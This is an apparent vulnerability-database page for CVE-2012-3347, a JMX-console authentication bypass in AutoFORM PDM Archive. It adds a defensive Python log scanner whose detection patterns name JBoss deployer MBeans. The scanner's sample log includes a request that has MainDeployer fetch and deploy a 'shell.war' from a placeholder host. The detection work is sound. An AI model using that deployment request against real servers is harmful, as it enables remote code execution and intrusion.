CVE-2012-3347
Published: 2012-06-13
Priority: P179
CVSS 2.0: 6.0 MEDIUM (AV:N/AC:M/Au:S/C:P/I:P/A:P)
Tags: ITW (exploited in the wild), VulnCheck KEV, Ransomware
EPSS: 1.54% (71.9th percentile)
AutoFORM PDM Archive before 7.0 implements user accounts in a way that allows for JMX Console authentication, which allows remote authenticated users to bypass intended access restrictions via the /jmx-console URI, and then upload and execute arbitrary JSP code via a JBoss remote-deployment mechanism, a different vulnerability than CVE-2012-1828.
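The description gives a two-step pattern: an ordinary AutoFORM account authenticates to the JBoss JMX console at /jmx-console, then drives a deployer MBean to pull in and run a JSP. Both steps leave a trace in the web server's access log, in particular the auth-user field, which shows an application user rather than a JBoss administrator hitting the console. The following Python is an added example (not from this page, EFS Technology or VulnCheck) that scans common-format access-log lines for that pattern. The MBean names (MainDeployer, DeploymentScanner, BSHDeployer) and the HtmlAdaptor `action=invokeOp` parameter are standard JBoss AS 4.x/5.x JMX-console details, not something the CVE text itself spells out; the log lines, IP addresses, the account `jsmith`, the application path and `shell.war` are all constructed placeholders.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional
from urllib.parse import urlsplit, parse_qs

# Apache/Tomcat "common" access-log format. The third field is the HTTP auth user,
# which is what makes this bypass visible: the account is an ordinary application
# user, not a JBoss administrator.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)

# Deployment-capable MBeans the JBoss AS 4.x/5.x JMX console exposes. The CVE text
# only says "a JBoss remote-deployment mechanism"; these are the standard names.
DEPLOYER_MBEANS = (
    "service=MainDeployer",       # deploy(URL) / redeploy(URL)
    "type=DeploymentScanner",     # URLDeploymentScanner.addURL(URL)
    "service=BSHDeployer",        # createScriptDeployment(String, String)
)


@dataclass
class Finding:
    severity: str      # "info", "medium" or "high"
    ip: str
    user: str
    reason: str


def analyze_line(line: str) -> Optional[Finding]:
    """Return a Finding for one access-log line, or None if it is not of interest."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.startswith("/jmx-console"):
        return None
    status = int(m.group("status"))
    if not 200 <= status < 400:
        return None      # rejected or errored requests are not a successful bypass
    ip, user, method = m.group("ip"), m.group("user"), m.group("method")
    params = parse_qs(parts.query)   # percent-decodes "%3A" and "%3D" in MBean names
    names_deployer = any(
        mbean in value
        for mbean in DEPLOYER_MBEANS
        for values in params.values()
        for value in values
    )
    invoked = "invokeOp" in params.get("action", [])
    if invoked and names_deployer:
        return Finding("high", ip, user, "deployer MBean operation invoked through /jmx-console")
    if method == "POST" and parts.path.endswith("/HtmlAdaptor"):
        # The HtmlAdaptor form posts operation arguments in the request body, which
        # the access log does not record, so a POST cannot be ruled benign here.
        return Finding("medium", ip, user, "POST to /jmx-console/HtmlAdaptor (arguments not logged)")
    if names_deployer:
        return Finding("medium", ip, user, "deployer MBean inspected through /jmx-console")
    return Finding("info", ip, user, "successful /jmx-console access")


def scan(lines: Iterable[str]) -> List[Finding]:
    """Run analyze_line over a log and keep only the lines that produced a Finding."""
    return [f for f in (analyze_line(line) for line in lines) if f is not None]


# Constructed sample (not real traffic): application user "jsmith" uses the app, then
# authenticates to the JMX console with the same account and hands MainDeployer a URL
# to fetch. "/app/search.jsp", "shell.war" and the 10.0.0.x addresses are placeholders.
SAMPLE_LOG = """\
10.0.0.7 - jsmith [13/Jun/2012:10:01:02 +0000] "GET /app/search.jsp?q=invoice HTTP/1.1" 200 5120
10.0.0.7 - jsmith [13/Jun/2012:10:02:15 +0000] "GET /jmx-console/ HTTP/1.1" 200 14233
10.0.0.7 - jsmith [13/Jun/2012:10:02:48 +0000] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system%3Aservice%3DMainDeployer HTTP/1.1" 200 23011
10.0.0.7 - jsmith [13/Jun/2012:10:03:30 +0000] "GET /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system%3Aservice%3DMainDeployer&arg0=http%3A%2F%2F10.0.0.7%3A8000%2Fshell.war HTTP/1.1" 200 1207
10.0.0.7 - jsmith [13/Jun/2012:10:03:58 +0000] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 1207
10.0.0.9 - - [13/Jun/2012:10:05:00 +0000] "GET /jmx-console/ HTTP/1.1" 401 1132
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(f"[{finding.severity:6}] {finding.ip} user={finding.user}: {finding.reason}")
```

The useful signal is the combination, not any single line: the same non-administrative account appearing on the application and then on /jmx-console, followed by a deployer MBean being named. Because POST bodies are not in the access log, a complete check should also correlate with JBoss's own server.log deployment messages, and the root cause the description points at, application accounts being accepted by the JMX console's realm, is fixed by the vendor update rather than by detection.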
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| efstechnology | autoform_pdm_archive | <= 6.920 | — |
| efstechnology | autoform_pdm_archive | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 2.0 | 6.0 | MEDIUM | AV:N/AC:M/Au:S/C:P/I:P/A:P |
| VulnCheck | — | 6.5 | MEDIUM | — |
GHSA
GHSA-c8cc-954v-xv37: AutoFORM PDM Archive before 7
GHSA (unreviewed) · 2022-05-17 · CVSS 6.5
VulnCheck
AutoFORM PDM Archive before 7.0 Remote Security Bypass
VulnCheck · 2012 · CVSS 6.5
Affected: efstechnology autoform_pdm_archive
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://nsarchive.gwu.edu/sites/default/files/documents/5986978/National-Security-Archive-Department-of-Justice.pdf; https://www
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.